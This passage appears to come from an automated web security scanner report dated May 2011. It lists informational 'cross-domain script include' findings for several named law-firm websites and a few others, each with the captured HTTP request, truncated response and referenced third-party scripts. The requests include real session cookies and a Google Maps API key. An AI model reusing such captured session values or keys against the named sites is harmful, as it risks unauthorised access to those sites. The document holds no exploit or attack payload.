Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305219554.1305223291.3; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=182215078; __utmb=182215078.2.10.1305223291

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:07:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.60. http://www.pomerantzlaw.com/institutional-investor-services/litigation-services-for-investors.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /institutional-investor-services/litigation-services-for-investors.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /institutional-investor-services/litigation-services-for-investors.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/practice-areas.html?action=practiceAreaDetail&PracticeAreaID=5
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.6.10.1305219554; __utmc=182215078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.61. http://www.pomerantzlaw.com/practice-areas.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.3.10.1305219554; __utmc=182215078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11119


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.62. http://www.pomerantzlaw.com/the-firm/what-makes-pomerantz-unique.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /the-firm/what-makes-pomerantz-unique.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /the-firm/what-makes-pomerantz-unique.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/institutional-investor-services/litigation-services-for-investors.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=182215078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:01:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
25.63. http://www.powelltrachtman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Powell+Trachtman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 32648
Content-Type: text/html
Expires: Thu, 12 May 2011 14:28:49 GMT
Set-Cookie: ASPSESSIONIDQSRQADRA=NLPBOPPBCENMJHPCICDDGMCG; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND13-80=1504003239.20480.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Commercial litigation/business transactions/business planning/risk mana
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.64. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /CM/Custom/Case-Studies.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CM/Custom/Case-Studies.asp HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp
Cookie: ASPSESSIONIDASCDRDSB=MPBKIAACBIHGDJIDLNEFJILO; BIGipServerFIRMSND13-80=423943434.20480.0000; CP=null*; s_sess=%20flid%3D1305216538594%3B%20c_m%3Dpowell%252Btrachtmanwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dpowell%252Btrachtman%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.powelltrachtman.com%253Apracticeareas%253Aemployment-claims-labor-relations.asp%255E%255Eread%2520more%255E%255Ewww.powelltrachtman.com%253Apracticeareas%253Aemployment-claims-labor-relations.asp%2520%257C%2520read%2520more%255E%255E%3B%20s_sq%3Dfindlaw-12282%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.powelltrachtman.com%2525253Apracticeareas%2525253Aemployment-claims-labor-relations.asp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.powelltrachtman.com%2525252FCM%2525252FCustom%2525252FCase-Studies.asp%25252523business%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216538598'%255D%255D%7C1463069338598%3B%20s_nr%3D1305216538601%7C1307808538601%3B%20s_vnum%3D1307808538599%2526vn%253D2%7C1307808538599%3B%20ch_directload%3D1%7C1305220380897%3B%20s_invisit%3Dtrue%7C1305220380898%3B%20omtr_lv%3D1305218580898%7C1399826580898%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220380898%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:43:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 69795
Content-Type: text/html
Expires: Thu, 12 May 2011 15:03:01 GMT
Set-Cookie: ASPSESSIONIDAQBCQCSB=KHDBOMPBGNPFDICHMIHNAFIN; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Recent Verdicts and Case Decisions | Accomplishments of Pennsylvania La
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.65. http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /PracticeAreas/Employment-Claims-Labor-Relations.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticeAreas/Employment-Claims-Labor-Relations.asp HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/
Cookie: ASPSESSIONIDASCDRDSB=MPBKIAACBIHGDJIDLNEFJILO; BIGipServerFIRMSND13-80=423943434.20480.0000; CP=null*; s_sess=%20flid%3D1305216538594%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.powelltrachtman.com%253Ahome%2520page%255E%255EEmployment%2520Claims%2520and%2520Labor%2520Relations%255E%255Ewww.powelltrachtman.com%253Ahome%2520page%2520%257C%2520Employment%2520Claims%2520and%2520Labor%2520Relations%255E%255E%3B%20c_m%3Dpowell%252Btrachtmanwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dpowell%252Btrachtman%3B%20s_sq%3Dfindlaw-12282%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.powelltrachtman.com%2525253Ahome%25252520page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.powelltrachtman.com%2525252FPracticeAreas%2525252FEmployment-Claims-Labor-Relations.asp%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216538598'%255D%255D%7C1463069338598%3B%20s_nr%3D1305216538601%7C1307808538601%3B%20ch_directload%3D1%7C1305220350194%3B%20s_vnum%3D1307808538599%2526vn%253D2%7C1307808538599%3B%20s_invisit%3Dtrue%7C1305220350196%3B%20omtr_lv%3D1305218550197%7C1399826550197%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220350197%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 31383
Content-Type: text/html
Expires: Thu, 12 May 2011 15:02:34 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Harrisburg Employment Defense Attorneys | Defending Against Pennsylvani
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
25.66. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poynerspruill.com
Path:   /newsandevents/Pages/SignUpForAlerts.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newsandevents/Pages/SignUpForAlerts.aspx HTTP/1.1
Host: www.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.poynerspruill.com/Pages/Home.aspx
Cookie: ISAWPLB{A742B51F-83D8-4EFD-BE14-22C82666BE24}={A1AFA5E0-233F-4E97-873C-6851032B7C8D}; __utma=27281085.1533661144.1305216539.1305216539.1305216539.1; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Wed, 27 Apr 2011 16:42:07 GMT
Date: Thu, 12 May 2011 16:42:08 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Last-Modified: Thu, 12 May 2011 16:42:07 GMT
Vary: Accept-Encoding
Content-Length: 44003


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Ld1sAMAAAAAAMzfxGPP1UHX5NHcVnCCIpH4U5R0">

                           </script>
...[SNIP]...
25.67. http://www.semmes.com/attorney_search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /attorney_search.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /attorney_search.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Semmes%2C+Bowen+%26+Semmes&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:02:43 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 40717
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADQBBCA=LMLMMCADAIHEPBNGGAHOODAF; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.68. http://www.semmes.com/contact/associate.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /contact/associate.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact/associate.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/contactus.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:04:05 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 28847
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.69. http://www.semmes.com/contact/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /contact/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact/default.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/contactus.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:04:03 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 30210
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.70. http://www.semmes.com/contactus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /contactus.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contactus.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/attorney_search.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:03:22 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 28585
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.71. http://www.semmes.com/offices/salisbury.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /offices/salisbury.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offices/salisbury.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/contact/associate.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmb=249483141; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:11:33 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 30438
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAeh1itwuvOrQOn8ZkVUUXgBScWz4hU7yAFECvWC-m_awUABfTvBR5AuLQmswvzfatvwOT5A7xzOkcgQ"
type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.72. http://www.semmes.com/offices/virginia.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /offices/virginia.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offices/virginia.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/offices/salisbury.asp
Cookie: ASPSESSIONIDAADQBBCA=KMLMMCADEPMDDMGHJLEPGMPD; __utma=249483141.1646832237.1305216169.1305216169.1305216169.1; __utmc=249483141; __utmz=249483141.1305216169.1.1.utmccn=(organic)|utmcsr=google|utmctr=Semmes%2C+Bowen+%26+Semmes|utmcmd=organic

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:50:14 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 30616
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAeh1itwuvOrQOn8ZkVUUXgBScWz4hU7yAFECvWC-m_awUABfTvBR5AuLQmswvzfatvwOT5A7xzOkcgQ"
type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
25.73. http://www.sleepertechnologies.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sleepertechnologies.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.sleepertechnologies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:41 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Connection: close
Content-Length: 19477
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAARCADB=MCGCODADMLMECKBPHGJPGMPB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<title>Baltimore Web Design by Sleeper Technologies</titl
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<!-- Monitor tag for Account sleepertechnologies.com (ID: 82), Site sleepertechnologies.com (ID: 88) on Queue LiveChat (ID: 172) -->
<script language=javascript src="https://livechat01.infoquest.com/SightMaxAgentInterface/Monitor.smjs?accountID=82&siteID=88&queueID=172"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
25.74. http://www.stumbleupon.com/badge/embed/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /badge/embed/1/?url=http%3A%2F%2Fwww.gartner.com%2Ftechnology%2Fcio-priorities%2Fipad-business.jsp%3Fprm%3DTW_CHCIOP HTTP/1.1
Host: www.stumbleupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/cio-priorities/ipad-business.jsp?prm=TW_CHCIOP

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 20:19:36 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
25.75. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superlawyers.com
